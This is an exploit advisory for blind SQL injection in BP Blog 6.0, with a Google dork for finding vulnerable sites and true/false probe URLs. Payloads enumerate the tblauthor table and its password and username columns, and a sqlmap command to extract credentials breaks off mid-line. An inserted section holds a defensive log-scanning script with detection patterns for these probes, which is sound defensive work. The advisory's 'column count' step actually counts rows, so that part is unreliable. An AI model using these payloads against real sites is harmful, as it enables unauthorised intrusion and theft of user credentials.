BP Blog 6.0 (id) Remote Blind SQL Injection Vulnerability

JosS, Jose Luis Góngora Fernández
Spanish Hackers Team
www.spanish-hackers.com

[+] Info:

[~] Software: bp blog
[~] HomePage: http://blog.betaparticle.com/
[~] Exploit: Blind SQL Injection [High]
[~] Vuln file: template_permalink.asp
[~] Vuln file2: template_archives_cat.asp

[~] template_permalink.asp?id=[blind]
[~] template_archives_cat.asp?cat=[blind]

[~] Bug found by JosS
[~] Contact: sys-project[at]hotmail.com
[~] Web: http://www.spanish-hackers.com
[~] EspSeC & Hack0wn!.

[~] Dork: "Powered by bp blog 6.0"
=0D

[+] Checking:

[~] True: http://localhost/[path]/template_permalink.asp?id=78 and 1=1
[~] False: http://localhost/[path]/template_permalink.asp?id=78 and 1=2

[+] Exploitation:

[*] Checking table:

[~] Exploit: http://localhost/[path]/template_permalink.asp?id=78 AND (SELECT Count(*) FROM [TABLE]) >= 0
[~] Exploit2: http://localhost/[path]/template_permalink.asp?id=78 and exists (select * from [TABLE])
[~] Example: http://localhost/[path]/template_permalink.asp?id=78 AND (SELECT Count(*) FROM tblauthor) >= 0
[~] Example2: http://localhost/[path]/template_permalink.asp?id=78 and exists (select * from tblauthor)
[~] If you don't see any error, the table exists.

[*] Checking number of columns in table:

[~] Exploit: http://localhost/[path]/template_permalink.asp?id=78 AND (SELECT Count(*) FROM [TABLE]) = [NUMBER]
[~] Example: http://localhost/[path]/template_permalink.asp?id=78 AND (SELECT Count(*) FROM tblauthor) = 1
[~] If you don't see any error, the table has 1 column.

[*] Checking columns of table:

[~] Exploit: http://localhost/[path]/template_permalink.asp?id=78 AND (SELECT Count([COLUMN]) FROM [TABLE]) >= 0
[~] Example: http://localhost/[path]/template_permalink.asp?id=78 AND (SELECT Count(fldauthorpassword) FROM tblauthor) >= 0
[~] Example: http://localhost/[path]/template_permalink.asp?id=78 AND (SELECT Count(fldauthorusername) FROM tblauthor) >= 0
[~] If you don't see any error, the column exists.
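
The following is an added example and is not part of the original advisory. It is a small Python script that scans IIS W3C web-server log lines for the probe shapes shown above (the "and 1=1" / "and 1=2" pair and the Count()/EXISTS subqueries) and reports which client sent a matched true/false pair on the same parameter, which is how a defender would spot this kind of boolean-based blind injection attempt in existing logs. The log lines are constructed sample data, and the field order (date time c-ip cs-method cs-uri-stem cs-uri-query sc-status) is an assumption about the server's log configuration. Note that SELECT Count(*) FROM table returns the number of rows, not columns, so the "number of columns" check above really confirms a row count.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs

# Constructed IIS W3C-style log lines (sample data, not real traffic).
# Assumed field order: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2008-11-20 10:01:02 203.0.113.5 GET /blog/template_permalink.asp id=78 200
2008-11-20 10:01:09 203.0.113.5 GET /blog/template_permalink.asp id=78+and+1%3D1 200
2008-11-20 10:01:15 203.0.113.5 GET /blog/template_permalink.asp id=78%20and%201=2 200
2008-11-20 10:02:30 203.0.113.5 GET /blog/template_permalink.asp id=78+AND+(SELECT+Count(*)+FROM+tblauthor)+%3E%3D+0 200
2008-11-20 10:02:41 203.0.113.5 GET /blog/template_permalink.asp id=78+and+exists+(select+*+from+tblauthor) 200
2008-11-20 10:03:00 198.51.100.7 GET /blog/template_archives_cat.asp cat=3 200
2008-11-20 10:03:05 198.51.100.7 GET /blog/template_permalink.asp id=79 200
"""

# Signatures for the probe shapes in the advisory: a boolean condition
# appended to a numeric id, and Count()/EXISTS subqueries.
BOOL_RE = re.compile(r"\b(?:and|or)\s+(\d+)\s*=\s*(\d+)", re.I)
SUBQUERY_RES = {
    "count-subquery": re.compile(r"select\s+count\s*\(", re.I),
    "exists-subquery": re.compile(r"exists\s*\(\s*select\b", re.I),
}


def parse_line(line):
    """Split one W3C log line into a dict, or return None if malformed."""
    parts = line.split()
    if len(parts) != 7:
        return None
    date, time, ip, method, stem, query, status = parts
    return {"ts": f"{date} {time}", "ip": ip, "method": method, "stem": stem,
            "query": "" if query == "-" else query, "status": status}


def classify_value(value):
    """Return (kind, truth) tags for one decoded parameter value.

    truth is True for a tautology (1=1), False for a contradiction (1=2),
    and None for the subquery probes.
    """
    tags = []
    m = BOOL_RE.search(value)
    if m:
        tags.append(("boolean-probe", m.group(1) == m.group(2)))
    for kind, rx in SUBQUERY_RES.items():
        if rx.search(value):
            tags.append((kind, None))
    return tags


def scan(log_text):
    """Return one finding per suspicious parameter value in the log."""
    findings = []
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None or not rec["query"]:
            continue
        # parse_qs decodes %xx and '+', and keeps a literal '=' inside values.
        for param, values in parse_qs(rec["query"], keep_blank_values=True).items():
            for value in values:
                for kind, truth in classify_value(value):
                    findings.append({"ts": rec["ts"], "ip": rec["ip"], "stem": rec["stem"],
                                     "param": param, "kind": kind, "truth": truth,
                                     "value": value})
    return findings


def blind_probe_keys(findings):
    """(ip, stem, param) tuples that sent both a true and a false boolean probe.

    A matched true/false pair on the same parameter from one client is the
    signature of boolean-based blind injection, as opposed to a stray quote.
    """
    seen = defaultdict(set)
    for f in findings:
        if f["kind"] == "boolean-probe":
            seen[(f["ip"], f["stem"], f["param"])].add(f["truth"])
    return sorted(k for k, truths in seen.items() if {True, False} <= truths)


if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    for h in hits:
        print(f'{h["ts"]} {h["ip"]} {h["stem"]}?{h["param"]} {h["kind"]} {h["value"]!r}')
    for key in blind_probe_keys(hits):
        print("blind SQL injection probing from", key)
```

Run it directly to print the findings for the sample; on a live server the same functions would be fed the current log and raise an alert whenever blind_probe_keys returns a key. Pairing the true and false variants per client and parameter keeps the alert rate low, since a lone "and 1=1" can occasionally appear in benign traffic but a matched pair from one source almost never does.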

[*] User and password:

[~] Exploit: ./sqlmap.py -u "URL" -p rid -a "./txt/user-agents.txt" -v1 --string "text" -e "sql query"
[~] Example: ./sqlmap.py -u "http://../template_permalink.asp?id=78" -p id -a "./txt/user-agents.txt" -v1 --string "bp blog" -e "